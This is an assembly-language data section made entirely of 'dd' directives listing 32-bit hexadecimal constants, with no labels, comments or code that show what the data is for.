dd 3FBAF3A0h, 32689EC0h, 0B8B68E53h, 1D1127B8h, 112B8C08h
dd 0B2CADF65h, 0AD5A3B8h, 7C937205h, 4A7D0394h, 0AB9A45B0h
dd 49338402h, 0BCF2C76Dh, 0D59ADCA4h, 0C12AFFB0h, 0BD1FC5B4h
dd 0A356DCE8h, 7F62E834h, 21FAE700h, 4F6CDB7Ch, 0F1528DEAh
dd 0A57E5A0Ah, 0A2DB5F7Ah, 0F943946Ch, 76E2F77Dh, 499B3CCDh
dd 45AAF95h, 263A4F33h, 0B9A7CF95h, 88D27024h, 11FABFE5h
dd 2AE7C89Ch, 290E8FBh, 955BF771h, 7535C200h, 0E5C69B0Fh
dd 0A6ED582Ch, 50D6760Fh, 3EC71F90h, 0DD96081Dh, 165D34E0h
dd 0ED4B08ABh, 0CC1AEF55h, 6D051303h, 4640EFD8h, 4015AC1Bh
dd 11EA4AECh, 36824BD9h, 6AF758E5h, 88C6E3B4h, 2A85F03Fh
dd 9845042Bh, 19D267D0h, 0C87FEE44h, 714AC584h, 18DB228Fh
dd 0A9222A66h, 0A4DF1745h, 0FE8B3E70h, 6DD3D7D9h, 5D364098h
dd 0B062865Bh, 13373FB0h, 15E34B18h, 9C29728h, 16032229h
dd 0B3A8F9Ah, 83D39653h, 899267E2h, 0C19EBE56h, 0B2CAB550h
dd 9A70A7B8h, 2938A30Dh, 726ECED4h, 81807965h, 0C7A65F0Ch
dd 5331DA58h, 0BA1FB965h, 95590083h, 7DF31E23h, 0C2EAA79Ch
dd 9EAE6334h, 71F9D490h, 3FB35650h, 1252A7A2h, 0A57F3F7Eh
dd 0F900D410h, 1ED66B3Dh, 49299CB0h, 0D3FD081Fh, 0C65F9BC1h
dd 6F8DCE2Eh, 0AEBD809Bh, 8E8D47AFh, 3BBEEFBCh, 17649ADCh
dd 79D7E857h, 566E63C1h, 743143C4h, 0D86AE58h, 0B3917053h
dd 0F393483h, 384AF7D0h, 0B75528ABh, 0E04A2F12h, 0B8CE8354h
dd 0BFB0CE22h, 0AED68E45h, 8F3492B1h, 419B53A4h, 98E87738h
dd 7DC0CDC9h, 8AE02068h, 952E0BE1h, 20270FC0h, 8D9D5201h
dd 534FEC38h, 0A6FEF372h, 7102FBECh, 9DEF6FB3h, 45E337C8h
dd 0F58E411Ch, 0DE0774h, 0B819BB4Ch, 7972F208h, 1D3EF2Fh
dd 0D16B3BD4h, 0FDDC1B1Ch, 9C293C0h, 1BCF574h, 0F4C59880h
dd 8D062E20h, 4E1FEECBh, 0E5BE7200h, 33A0CE01h, 3517C12Dh
dd 2922F788h, 0E9DBFC86h, 579A6FD5h, 0B6D28D89h, 3D9AD308h
dd 121ED365h, 0B10E4B4Fh, 42760BDEh, 89B47F7Dh, 0D52B3A34h
dd 35199934h, 27D2503Ch, 0CE03B5B8h, 69EBCC92h, 0A88A1F25h
dd 0CDA3ABB9h, 1577481Eh, 0F80E83A1h, 0D608ABF7h, 203E7FA6h
dd 0F9B3438Fh, 0C5ED3824h, 0A2B3AF1Ah, 2D669B37h, 0D91247F8h
dd 0B1FBDCA6h, 60BA0F35h, 0DC493E8h, 7D665878h, 7DAB0C8Ch
dd 0E24A5FE6h, 0EB8EBE03h, 2BFF7748h, 0B4E8350h, 71BDA6Ah
dd 78A27607h, 0A0910798h, 0D59EC669h, 0C0A97F70h, 0B924740Ah
dd 568AD8A8h, 9A2EE3B5h, 0A17B1F44h, 0F7B8DBECh, 9994774Dh
dd 0A1F1B37Ah, 710ADE91h, 0E876D53Ch, 97E37139h, 0B2C00A44h
dd 0CE512D55h, 62E7FD8Ah, 136309B3h, 0D60842A4h, 0E77AAA0Fh
dd 0C6EF4B5Ch, 0D64798E9h, 0D8EEA374h, 21276D05h, 0E54671ACh
dd 0D99227F4h, 70412054h, 318AA940h, 5D16A741h, 0D6A7F888h
dd 5C4E03D4h, 0C19A2F51h, 0BFF6458Dh, 0BCFDD111h, 451ED3C1h
dd 3D223933h, 397906E0h, 0C9825771h, 0E6DB4308h, 2EC0B3ECh
dd 4D0657E9h, 0B95F4AB8h, 985E13E4h, 85EF3831h, 217A1449h
dd 0A89EC268h, 1D2E3CEAh, 0F02F9BD4h, 0DD65454Dh, 8C9D6822h
dd 0FA99554Ch, 0EBDBB070h, 7D36EC8Ch, 7610F55Fh, 955B9F61h
dd 0B17A7C00h, 0E596CB7Ch, 5912A771h, 0B499CC0h, 0D52B70BCh
dd 0FD03D4FCh, 6CA2373Eh, 6F8F794h, 0B9F26A9h, 3C26BBBAh
dd 0B97007B0h, 93CF0264h, 353F8060h, 0B0F6CB6Ah, 919D4FDh
dd 5C1DB3B4h, 0F32A5E94h, 58790ABDh, 19925254h, 0DADAB7C3h
dd 313FE305h, 1D9513BCh, 0E9774045h, 36774214h, 559C2073h
dd 68B4FA1Bh, 1A5B8AC4h, 0EA2D7CD6h, 86364B96h, 92D22575h
dd 4A9EE45Fh, 309CD101h, 46CBBEEh, 0E22F68DEh, 0A1D77B96h
dd 97D11F74h, 65CAED35h, 3871D91Dh, 1A4DBFFCh, 0B54C03A0h
dd 0C19ADF1Fh, 9FD67B0Ch, 549BFF37h, 266CBA4Ah, 0F0469ED7h
dd 0CD5872A4h, 80CC5784h, 788E2877h, 4E96E729h, 476EB005h
dd 0CB17B4EDh, 974E4AE4h, 0C0BA6A20h, 33F6451Ch, 63CF8D68h
dd 55408ADBh, 0F3339986h, 0F86C4EB8h, 0F9B247F0h, 0E85FCE24h
dd 51AAA2C4h, 68414E5Ah, 764217E8h, 955BB761h, 0FE528E00h
dd 13ACA758h, 6C4212F3h, 0C967F3C4h, 9B3F31ECh, 22A8AA9Ah
dd 64810215h, 75F8C3E9h, 436C2460h, 0C8405EDBh, 8A188255h
dd 401153A4h, 11EA4CA0h, 0C7B002A6h, 0B2FC99E4h, 5ACCE205h
dd 24F74C2Bh, 0CDC64E5Dh, 73D20D68h, 816B4C4Ah, 0F20A9FA5h
dd 995ECFC0h, 0AD8A1CBDh, 0A68E4314h, 0FEDA2C66h, 6DD333D9h
dd 857A2F98h, 82B6EC5Bh, 826A3FF0h, 0B2E9085Ah, 9C3D977Bh
dd 55AE96FCh, 9EC6FE68h, 7E10F353h, 546DD807h, 0E5FE6007h
dd 31CA94B8h, 1845FE7Ch, 4710C4DAh, 0B5024F90h, 0F406BA1Fh
dd 0E74E7B4Ch, 4EF28758h, 2C6CA317h, 0D04C8BDEh, 28895BDCh
dd 0C9C262A0h, 20FAE6BDh, 10F58F00h, 55E656E1h, 1CDBE7F8h
dd 0A53E0582h, 6D1FA041h, 8ED62B09h, 29E2B320h, 98BB4E94h
dd 0D85AAFB8h, 9B4A8641h, 2F5A4758h, 63216CD2h, 4C8D3AB7h
dd 8DC9CBDCh, 942BB22Bh, 586E23B4h, 0A1A76895h, 6792CB2Ch
dd 0B12CD79h, 653EF1ECh, 81DFE050h, 58966BCAh, 0CBD72DC8h
dd 28940ED9h, 2B48AF20h, 0A93768Ah, 0ED7247C5h, 94CE03B2h
dd 253F8062h, 65F6CB6Ah, 7F2E4297h, 10E8E3F4h, 0A13A378Dh
dd 0CD8AB3ECh, 4A856738h, 16B5F00Bh, 3D4EF1A2h, 8A9EBF0h
dd 0A9220254h, 0F5892B87h, 0B4576F20h, 2DA6A308h, 858F4AC1h
dd 6D5E5391h, 2E95C9A1h, 0FDB647F4h, 478BC028h, 1ABED3Dh
dd 2D768BAEh, 11D3E4ACh, 5C9267CDh, 23A7CC4h, 0A2CA9F51h
dd 5D16AE14h, 0EB977A88h, 0EC4E43CCh, 0F782926Dh, 0F74E7B4Ch
dd 0BA0D78AEh, 528CFD9h, 1525FFB0h, 0BD760A1Eh, 0C812BB69h
dd 7DFA6334h, 21FA8E41h, 78FA4E93h, 5DD3E7F8h, 0A57E3254h
dd 9B5ED440h, 8829393Ch, 29A28154h, 570311h, 92D287ADh
dd 38993BCCh, 0F9F272A4h, 0B85D71CFh, 51AAA219h, 0F01FBE9Ch
dd 0C95F7A2Dh, 409173F4h, 0E1FA7908h, 89C95BA9h, 5912A643h
dd 0EE32B30Fh, 3E7AE0D0h, 9D8B4279h, 0A427B108h, 34CEC36Ch
dd 4070AF0Ah, 0F8D9F9E6h, 0B93231CCh, 0CA61AB67h, 11AB6DB4h
dd 0A87B185Ch, 4942CA0Dh
dd 0C67CF3DEh, 977E9A3Fh, 0D035BACh, 1920E237h, 9873B344h
dd 714AC216h, 21BEE30Dh, 0C19DC832h, 0F58E4380h, 883C447Eh
dd 0D2B29F78h, 39075F0Dh, 11E39EA4h, 606A7FEDh, 72BA31Dh
dd 4D4968D7h, 0B52FB350h, 457EC488h, 85A6DAA8h, 0D1B663F3h
dd 0E5BB9B54h, 1FEF9F50h, 0A16D34Ah, 5C766277h, 71CD0394h
dd 0C7DDE9ECh, 6C33F62Ch, 53F2C745h, 453FBB64h, 0C278FFB0h
dd 8B669E23h, 0B50F57A8h, 0EAF97710h, 61CFD7D5h, 75021D6Ch
dd 9938A7B2h, 5A2D6494h, 0B1BC4F85h, 9030683Ch, 69FF15F5h
dd 1D0EA994h, 815AEFACh, 3899689Bh, 0F9F27108h, 5DE9F19h
dd 0DCA7CA70h, 3D008529h, 0C4CF9AA8h, 0FE6E63CCh, 0B0BA25CEh
dd 9839C87Ah, 59529174h, 1B3E0B07h, 4FC18EFFh, 0EBD89E71h
dd 0E4127748h, 25BB2DA6h, 0BBE24700h, 1F470473h, 347BE4CFh
dd 2F755293h, 0DF81B0BBh, 0BB836D1h, 0EDF1D728h, 2CC51433h
dd 0A1EFF093h, 4D861BDAh, 59C71085h, 0F8AB244h, 717FEFF8h
dd 21C314BCh, 296277FDh, 0B5B60EA9h, 10AE6F20h, 308F3E8Bh
dd 7932C7D8h, 9813A4h, 0D12A07BDh, 3E0A21Ch, 8C0568D7h
dd 55AEB6F4h, 0E13ACF80h, 8D42D9F1h, 0F9DD2DF5h, 8BD11C6Ah
dd 11ACF070h, 3870C210h, 496DD7A9h, 0D0236AA0h, 0E1F55BC0h
dd 88CA1E6Fh, 4D93F53Ah, 4F13F201h, 0B10ADF90h, 0CE5644FCh
dd 0ACEF3A9Dh, 74C94346h, 4F9FEB32h, 1F0CD64Dh, 0F7378BDDh
dd 0D61B5FB0h, 0D1F33363h, 6DA60A54h, 47839731h, 0D6BE3F0h
dd 0F5398AD0h, 811255ADh, 98C63438h, 6BB7F74Ah, 7CCA8517h
dd 1C61C191h, 0E02A74DCh, 0B44E449Ah, 859A236Ch, 6CE6E24Dh
dd 3732C316h, 115694EDh, 0DE2C3FFCh, 0AFF00B8Eh, 8DCC1261h
dd 1587A327h, 3573CE17h, 3A2CF6B6h, 0DC0062B0h, 0A0EC32C4h
dd 64C50610h, 4F90AB70h, 2D6CB201h, 0D60EDCC7h, 801F62AFh
dd 0EDF212CCh, 6DF21451h, 49BDE2Dh, 567E96B0h, 0FC3ACBCFh
dd 0A44352BCh, 320A471Eh, 0A7CE7C10h, 0F99F565Ch, 724873D7h
dd 234A3AA1h, 6090DAE0h, 0BDAAA13Bh, 8C490E7Fh, 0CF35CDAFh
dd 12FBB19Ch, 14EB5CB6h, 0EEC06F9Ah, 4EE72444h, 74E8406Ah
dd 0AB09DE49h, 7DB9DA7h, 1A27DCB4h, 0AD5673B3h, 551529CEh
dd 39F28780h, 451ED364h, 912AFFB0h, 0BD760BDCh, 0C98257E8h
dd 15AE6334h, 21FA8F40h, 4D06DB6Ch, 9952E7B8h, 0A57E33C4h
dd 0F18A5F10h, 1DD66B3Ch, 29E2B748h, 0D08DA394h, 811AD606h
dd 7C3B8CCh, 0F9B20721h, 119D242Bh, 5EF2ECFDh, 7E30802Bh
dd 0AD069C78h, 0D92C08D0h, 0A3815672h, 86D2E824h, 1B39B33Ah
dd 0C3AB7A88h, 384A5FE9h, 9DAF8179h, 6AA79C08h, 0EC2CAB96h
dd 411E6D01h, 4FD17E04h, 0DD9A0798h, 0AD9E53E4h, 11AA7F10h
dd 1FD20ED1h, 705BD728h, 162297ACh, 56980B00h, 0F408DE13h
dd 0EE116778h, 0D273B09Dh, 920A9FB2h, 612614ACh, 41E13747h
dd 7C78A110h, 41F84BBDh, 2DDC384Ch, 4B19C2ECh, 84E61A7h
dd 8A32C3BEh, 0FD8CC842h, 3B3D935Ch, 2711A09Fh, 9E6D2790h
dd 436DE453h, 0E038AAD3h, 0E6E67344h, 0BE09AB1Bh, 1D2F39F9h
dd 0E7A73088h, 0B54E43EDh, 299A2FE0h, 0EDA67B30h, 7C02D3h
dd 30F6D324h, 79D50047h, 0BD760BC4h, 0F00CEA6Bh, 60AE6374h
dd 81670648h, 0A6069B4Eh, 17DF1824h, 667E73FDh, 0C818DA9Fh
dd 885F6B7Ch, 29A28EC6h, 750EC07Ch, 4293DCA0h, 0ADE6A847h
dd 11E04718h, 0FA216DC9h, 68402A73h, 0AB35CBDCh, 894E6D2Bh
dd 0D469A7FBh, 9B394F00h, 89C99B3Ch, 5912A785h, 3532B10Fh
dd 4EB4D738h, 77132803h, 0EAA23731h, 3D44D392h, 351A56E0h
dd 43DF7B95h, 523204ACh, 0C4D6D815h, 0CE759EB1h, 0C4775483h
dd 494E9B2Ch, 0BE770FC1h, 5B838C08h, 0CD31D4E3h, 98B46738h
dd 17CD4D3Ch, 71A15A9Fh, 1E00EBBCh, 0AC1737F2h, 1E9E099Fh
dd 2D0E422h, 5F0EEABDh, 7ACD3866h, 0C567B911h, 11EF92F0h
dd 79B9B064h, 9C297ACh, 6C44168Bh, 896ACFC0h, 72B9E5F9h
dd 0E038A2FBh, 60317344h, 318AA6FAh, 0E32AF7Fh, 5A20370Bh
dd 0BDF80C0Fh, 81A3D03h, 0C967282Ch, 25DB837Ch, 6112FA40h
dd 78C1BFEBh, 6A79F05Dh, 0F7F68A53h, 500698B5h, 178E542Eh
dd 765F20EDh, 0B7261819h, 87A8C845h, 0D7FEF3A5h, 0F44590BDh
dd 37964410h, 9C733815h, 972E1CF8h, 9220C04Dh, 0F7C6A63Dh
dd 3AEE68A5h, 579E5E55h, 44A45E63h, 601917E8h, 2A91DC85h
dd 0F578CC5Eh, 0F23874C5h, 33126487h, 70D6AB80h, 39B5E026h
dd 9DB2FA69h, 0D81A1108h, 0F52C814Ch, 0A318AC84h, 6B4C50EAh
dd 4C88EF80h, 71DAC1Bh, 7B7BF838h, 0D01ED359h, 0C9FD289Dh
dd 9E5DE04Eh, 24785F70h, 0CDC67F3Dh, 73F58C92h, 0A554EB2Ch
dd 697FDC6Ah, 50BEFA0Ch, 119DC83Dh, 0F58E4315h, 0CAEBDA4h
dd 0E7185B9Dh, 7CD93173h, 855E131Ch, 6E889470h, 0C10BC6DFh
dd 0FEC2D71Ch, 15DA92F1h, 613ACF80h, 3D456F2Ch, 5C658D98h
dd 0E5FE4735h, 30CA9F53h, 5DE02F73h, 3C9AF788h, 1EA6EF5Fh
dd 5727A64Bh, 5DA63B35h, 0CE592DB0h, 52AE2E1h, 912AFFB0h
dd 27CB82DDh, 0BD8217D1h, 242B947Fh, 21FACF74h, 0F504DB6Ch
dd 0AFAD83DFh, 0C2C636B1h, 5AA4D474h, 1DD6D35Ah, 2A961C2Eh
dd 82A49E24h, 0C16EDE25h, 0AD663BCCh, 943FFF10h, 13AB932Ch
dd 65DB3A87h, 7D36CBDCh, 0AFA13A8h, 0A16E2B31h, 0C39F705h
dd 426D9BD4h, 6D23228Fh, 653DF3C4h, 0B53E1FD0h, 763CC24Ch
dd 0D034F283h, 0FA458314h, 993674Bh, 5CA30C70h, 0BA7247ECh
dd 0B19E53E4h, 75CDC76Fh, 807FBDA3h, 4942EEF6h, 952E5B1Fh
dd 19D16BA7h, 0CD867D65h, 0E76F8F93h, 54E4CBBh, 8EF61078h
dd 0FB6F0843h, 0CF77C870h, 7E25D2BFh, 41EE5EB5h, 0DA344C4Ch
dd 7932C45Ah, 6D4A66A4h, 2E95C167h, 545E54ACh, 6F3D68D4h
dd 33FB5CCCh, 0EA915E2Bh, 13C39063h, 0F29267C1h, 19F6FACCh
dd 5FB1AA7h, 5D12AB3Ch, 7B56F788h, 4B8E2A6Ch, 0C9228428h
dd 46A20FCCh, 0D20AF2E0h, 0C0E97803h, 916ACB81h, 0BD760BD4h
dd 74021D9Dh, 15EE571Bh, 99BBFB40h, 842FC345h, 0AD7942B2h
dd 41BE3384h, 0DA2F5513h, 0B6D62B08h, 0A34806F8h, 353AEC11h
dd 0C1EA45A0h, 994DBEC6h, 9F184758h, 0F223719Ch, 11DE8EF5h
dd 7D36DB9Ch, 394563A8h, 6D0889BDh, 4ADCB375h, 3E6C739Ch
dd 0E49B0CB8h, 657ECA06h, 857B9A27h, 0DDB62BBCh, 0E0D77708h
dd 0B0C4DBE4h, 415A9B49h, 0EC9E9D26h, 88F7F018h, 859E13D0h
dd 65AA7F30h, 15320B5Fh, 7D2B7262h, 3E48E3F4h, 98FCB249h
dd 3A2D5BACh, 59E656BDh, 25FEB344h, 0C103AAD0h, 0B4D3E9ECh
dd 36277FCh, 0C1BFC6E3h, 15A6F60h, 2693BB4Ch, 0FC387F28h
dd 851E278Eh, 0B757D45Ah, 0AAE7AA4h, 49F6A6ADh, 55EFA374h
dd 0D138BB80h, 0A7E31185h, 199267CCh, 40B470E0h, 318AAB7Ah
dd 0E570001Ah, 0ECD50709h, 0B50E37E5h, 0C19A2DE0h, 25127979h
dd 0DD82252h, 0EE78D324h, 0A8884239h, 81CE0B9Ch, 628257CCh
dd 219FE6C3h, 21F28F00h, 2172DB6Ch, 0AD63624Fh, 0A17E3384h
dd 0FAFF5F10h, 98DCD38Ch, 29A28363h, 8243283Eh, 0C16EDE25h
dd 0AD6E3BCCh, 9FA33218h, 0F3E109Ch, 11DE94D5h, 4E9DAD9Ch
dd 9CA9BD68h, 0CD479B92h, 0D591EA0Ah, 0E9069B6Ch, 72B7AD7Bh
dd 33EB3B0h, 80CFE87Bh, 0DD966BC8h, 8FA27718h, 410E02ECh
dd 49DE2F63h, 590D5E86h, 12140798h, 0EA1BE5EBh, 0BAAA3F04h
dd 9C70EABh, 4902D728h
dd 9C5AA3B4h, 24785F70h, 0CDC66FC5h, 28579092h, 25FEF370h
dd 0C10ADFB0h, 99549E3Ah, 572DBACCh, 0C1A7E69Eh, 8C536F60h
dd 2DA682C6h, 85B26CFEh, 355966A1h, 2E25BFF0h, 7841E15Ch
dd 982A319h, 55EEE374h, 505C77E6h, 0A4F219D9h, 0C1228C9Eh
dd 0D195F60Eh, 0D10A9F10h, 0D5A6017Fh, 5D13727Fh, 354E0394h
dd 0C3EF2FE0h, 482CFDBCh, 39B2B371h, 0B99E7802h, 212D8AB5h
dd 42398BDCh, 4C75FDA8h, 15EE5705h, 21FB8F40h, 0DB6D019h
dd 0AD7B62B2h, 4ED43384h, 7232391Fh, 347361FCh, 4FE2F77Ch
dd 0DF0F733Fh, 0B56B6A57h, 0AD663B8Ch, 0D6C7471Ah, 31EF16D3h
dd 51EABF30h, 6743CB98h, 0C48D718h, 0D52E17DFh, 0D58AEA8Ah
dd 0ED079B6Ch, 3FAAC168h, 658E5805h, 0F1FA173Bh, 0E9BDAEF6h
dd 1E087748h, 75FAB2D1h, 491AAF60h, 0B368E8Ch, 0B39A8460h
dd 85AA7941h, 0A1011930h, 8DFE605Dh, 6387DD20h, 3F2EA380h
dd 954B8A37h, 0CD865BACh, 6C636728h, 9D989631h, 0D4002713h
dd 9D16DF96h, 69519CAEh, 7F336ABEh, 0F6DA2F19h, 6DD28AC9h
dd 5932C798h, 344166A4h, 0B771D487h, 0F7AE42A4h, 49F6BD8Dh
dd 560A6374h, 55106A8Ah, 26201BECh, 0E0189AD1h, 24347344h
dd 8403ADAh, 0F670AB3Ch, 0EC20AF38h, 0B50E37FDh, 0F01FD84Ah
dd 0EEA63B38h, 36F38758h, 451E54E0h, 0F54D47B0h, 30FD2D57h
dd 0C9C263D9h, 15AE92B5h, 0E00D8D40h, 4E06DB6Ch, 0FEEAE2CDh
dd 0E50B4A0h, 0F18A5FA8h, 687D0D3Ch, 0A25AD14Eh, 0CDA5A571h
dd 87D588C4h, 0CBA60867h, 0C837B0B3h, 5DED310h, 24EBBF70h
dd 4CB33CDCh, 8942579Ch, 0A16623F4h, 6C022926h, 3C436C40h
dd 5912E74Ch, 6A3CF384h, 5040DE45h, 1412809Ah, 51C47F7Dh
dd 9EA88770h, 49AABC8Bh, 0B281026h, 0BB2F5F60h, 85AA7861h
dd 0FA011930h, 973F3B5Fh, 7D33529Fh, 952EE3F4h, 810E8FC0h
dd 48AC5C5Ch, 19925311h, 28E45385h, 712ED719h, 0A97F4EBEh
dd 4DA23788h, 0F14AC317h, 0ABBBDF8Bh, 0CD19032Ah, 4D1B6292h
dd 2E3813E4h, 0E55BBA07h, 0FD964B5Ch, 5AB69728h, 61DF2683h
dd 613ACFC0h, 80323BACh, 0D991E00Fh, 0E0CA7304h, 0DA600FE0h
dd 0D6D1208Fh, 291B7505h, 3C8F28D4h, 992AD3A1h, 0D98FFE06h
dd 0CE588718h, 52AE2E1h, 0D12AFFB0h, 0DB7A7FDCh, 0C3410750h
dd 559A4AB1h, 47F06440h, 47E624D4h, 0D966CE1Dh, 52D555C4h
dd 0B1BE6E95h, 1DD6683Ch, 0DE91C349h, 353AF211h, 815AEFA0h
dd 5A6B4FECh, 0F9B244DFh, 0B5DBE724h, 0A20115E0h, 0F8BD0417h
dd 89022E32h, 9DE7EBDFh, 16737CFCh, 4DF2AAA9h, 0D912A778h
dd 0E8308684h, 0F17E3655h, 9D9EA1FCh, 9AA18E88h, 0F8CA0EACh
dd 410A8B24h, 0DD2E1B4Dh, 0BF91AC53h, 5AFEB82h, 0A9CCD456h
dd 859E0BD3h, 4B02D768h, 0CD858555h, 0D4B38A6Bh, 0FC3E3DEAh
dd 0A97901F8h, 0A0731987h, 714AEBACh, 0A9676E4Bh, 0A9623788h
dd 0F3FB5314h, 59224477h, 7E6DA2A7h, 52CAECB0h, 27D39874h
dd 0D06A7FC9h, 0BD8FC989h, 82FB9628h, 0DCEA8730h, 212AA23Dh
dd 0BFB90ACh, 0F29267C1h, 0A587F181h, 4F6850h, 1D16EB48h
dd 1D22F788h, 1E96F4D6h, 979A2B22h, 431BF85Bh, 39F2C761h
dd 44C7576Bh, 9CC2FFB0h, 0F6760BDCh, 8CCC05ADh, 3B9C5078h
dd 21B6C304h, 788E4E93h, 1CDBE7F8h, 0A53E0A7Ah, 0CDD2D443h
dd 6E29B33Fh, 1DA13C60h, 8AF83F7Ch, 27CF645Fh, 0F6667BF5h
dd 70BE051Bh, 45E751A1h, 59A8BC70h, 44F04E15h, 0FAC917E8h
dd 55DDDCDCh, 9BA4F00h, 0F2396DF9h, 60B41AF3h, 8D68F3C4h
dd 4EB5E919h, 0E430BE77h, 0A3297748h, 3984805Ch, 0A899614Bh
dd 0DAEF489h, 0B67207D9h, 0C59F0960h, 0BB1F7C30h, 3EF6CB65h
dd 93BA5DDh, 7D124FB4h, 0A1D88ACFh, 8B0B5BECh, 6B574C3Ch
dd 26FEF37Dh, 0F7E28F96h, 1EA9144Ah, 0E95B9175h, 0FEFB4314h
dd 0ED6281Bh, 2DE7A0CFh, 403E2C98h, 0C567B531h, 0DCEF30F0h
dd 0FEB64B1Dh, 49FBE5ADh, 6D6FC574h, 0E435EA7Fh, 8D461B50h
dd 0F2906773h, 0DEE4747h, 0CE356919h, 64B01645h, 0EC2DF7C8h
dd 0B54E0330h, 0F830AAE3h, 68A57B4Ch, 39B2BE2Ah, 235D3EFh
dd 5CA8F0BCh, 86760BDCh, 4A8D5FAFh, 15AE63F0h, 22F84FC3h
dd 0C805CF2Bh, 9912DECAh, 10816396h, 0F1CA66AEh, 289EFEC3h
dd 0ACB8B708h, 0C28BCC54h, 685AEFA0h, 0AD663B50h, 7CBDB824h
dd 5DE93B0h, 5EFF81F0h, 7D364019h, 88049CA8h, 855A60DFh
dd 1E4F97E8h, 0AB7BA2D3h, 2C12E741h, 0CFBBF0F3h, 0B24A5FE9h
dd 9DAF5979h, 2327FE08h, 0BECEC36Dh, 839F9460h, 1F26BBB5h
dd 7FF73CD0h, 0B79E13DDh, 11AA4259h, 0A84FB5Ch, 4902C880h
dd 69606EB4h, 0A351CE4Bh, 0F69619EFh, 59EBADBDh, 0A6F2C644h
dd 40F5CF54h, 8172AF33h, 6A79DCA9h, 0CC1CC69Bh, 8ABA6F60h
dd 6DDFC9F9h, 8F442F98h, 2C3FEC5Bh, 516A3FF0h, 0BA9D4569h
dd 32CBE524h, 0D7E1AB33h, 9EC530BCh, 3FC314E5h, 526DD806h
dd 423F5738h, 31CABB61h, 22E95483h, 23A3CB63h, 0B54E63F0h
dd 1A96100h, 6A827787h, 79CB29DDh, 70A75E64h, 922AFF94h
dd 0FD4F7959h, 6C2731E8h, 1668487Ah, 63D19B02h, 0B6401D60h
dd 0CBD32050h, 0A07E33C4h, 788A5F10h, 4389977Ah, 67573A8Bh
dd 230E83ACh, 0B4267A5Fh, 55E53B8Ch, 423648E7h, 8CDE9324h
dd 11D3EDF5h, 2B36A19Ch, 0BCF68257h, 15EB23B4h, 0E11ECB0Fh
dd 0CDED9B2Ch, 5A78F728h, 0D3F99D4h, 714A1FD0h, 8103D4AAh
dd 6AA2373Dh, 0B1C17CACh, 411AAA5Eh, 54707E05h, 34FF0798h
dd 0C5DE6ABEh, 28C8EABDh, 6FA78B1Ch, 0B652D702h, 0D51B6721h
dd 5E828CC0h, 0C88ADFE3h, 19B86738h, 1CA806BBh, 0E4F5DFD0h
dd 9D16DE3Ch, 0A69DCF4Bh, 0F58AB690h, 6B5FE620h, 1EE6FB75h
dd 28F1C451h, 813442F4h, 87DFC0A1h, 2B60B25h, 49F7F7BDh
dd 5A2E2674h, 613E1E04h, 48F28ACh, 99AB497Dh, 0B4EF2204h
dd 3ECA8038h, 0C8E9FB7Ch, 6962C228h, 3141C351h, 0C19A2B6Ah
dd 0D4D4FE85h, 81318718h, 451EBAA9h, 6612B43Bh, 0FD423A59h
dd 0C98257E8h, 16A81624h, 61EAE2C5h, 4ED4E86Ch, 6EA31079h
dd 0DFFBBA25h, 498A1F29h, 1DD64F07h, 2ADEFCC3h, 351EAE11h
dd 8288DCA0h, 5A97CC0Dh, 8F37CEF9h, 0C6DED31Dh, 57A1087Fh
dd 0F0032865h, 3E4D0FFBh, 56D37B7h, 0C97B2449h, 37474B2Fh
dd 377BD027h, 0E623877Dh, 0C34B13AAh, 0E1DDA01Ch, 0EAB63583h
dd 71439316h, 98ED5028h, 0E81D3AAFh, 0B9323EB2h, 0E1CAD827h
dd 9E6A4C20h, 3DF633DEh, 86891468h, 28A3E85Fh, 0A13A378Eh
dd 0FE59D010h, 78EECBF1h, 5FC2B536h, 5126DDE7h, 0E90AD716h
dd 0DD4C0B24h, 808E7FC9h, 8A138CC8h, 75A3864Dh, 7246C7DDh
dd 0D71D4099h, 0E2EF30F0h, 7649B4E3h, 4095AA2Bh, 0D1E1E03Ah
dd 9EC530A6h, 0D8054C91h, 0C21628B6h, 0D8418CFBh, 3F9DC07h
dd 0A2062F73h, 391F0877h, 0BA015787h, 3E652A64h, 57D48F3h
dd 0C60D7975h, 0BBE6576Bh, 4319004Fh, 0BD761D34h, 36EDBFE8h
dd 15469CCBh, 7CFA8F40h, 628C36EDh, 0A4BBE7F8h, 0C17E33C7h
dd 44016DEFh, 1D96524Eh, 4FC03E2Ch, 2F43FD15h, 827C6AAFh
dd 0F3ED3BCCh, 9F6C4424h, 408EA8A5h, 52FC3A7Fh, 3EC1CB9Ch
dd 896217BEh, 0DCEB2CF4h, 17BA4F03h, 86C4C76Fh, 0DD1D8736h
dd 653EF178h, 48CB1333h, 0DD962AFDh, 0EB4CF107h, 0F8268354h
dd 4EE5509Eh, 6D24180Eh, 0A9388CD8h, 7D9219E7h, 11AB7F30h
dd 0D718630Dh, 0DC322897h
dd 956ED79Bh, 144A2F71h, 0CDC66FDCh, 0D02C4752h, 0CDEACB1Ch
dd 8EF53544h, 9593939h, 9880E40Ah, 0B5BA7281h, 693F8420h
dd 2DE6BB4Ah, 7934AFC1h, 6D0613A4h, 2E95D544h, 0C99FCE96h
dd 8D449768h, 15DA8A5Eh, 48BF4780h, 6F465B98h, 0E817D018h
dd 0EDBE3330h, 44CA9F50h, 76AB2B75h, 6822B7BCh, 30B9C6A0h
dd 0C1DA1BD1h, 0ECA67B0Fh, 84729C2Ch, 455EE74Dh, 119A8BB5h
dd 0FD422161h, 6EF652E8h, 2185DEB4h, 55FF8F00h, 7C832CF2h
dd 9952A78Ch, 0D1FE33C4h, 0D837DF19h, 1FD62B08h, 8C613E3Fh
dd 754EFA3Ah, 75D507A0h, 6D8EC433h, 114DB8E5h, 5DE9101h
dd 689C22FBh, 0A3DECBDCh, 86BDE854h, 0D56C2870h, 930FC400h
dd 86C6DB15h, 87119B26h, 9AC32C6Ch, 44C8102Fh, 5C962BFDh
dd 0E9C25342h, 0CB456354h, 3B19F932h, 7D5CF898h, 8D43822Fh
dd 0C59E53A4h, 1FDF6F30h, 9CA3ED1h, 0C489D728h, 956EF3D9h
dd 182DAB33h, 0CD8652E3h, 9D2D2B5h, 800DB304h, 73E9DF21h
dd 18A14F4Fh, 0A92203F9h, 0E58E4314h, 172EB2Fh, 5E19BB4Ch
dd 885D2FB0h, 10D5EC5Bh, 0D12A0656h, 79B99999h, 9C297BAh
dd 6C9C16FFh, 2BB1CFC0h, 0A90C9ABCh, 39922798h, 96B6392Fh
dd 3203AC52h, 0D02DBF0Eh, 6962E7E5h, 0A5238E5Fh, 97E82FA0h
dd 6E824787h, 79E2EAFDh, 0E29DD364h, 912AFFDDh, 0B50C80DCh
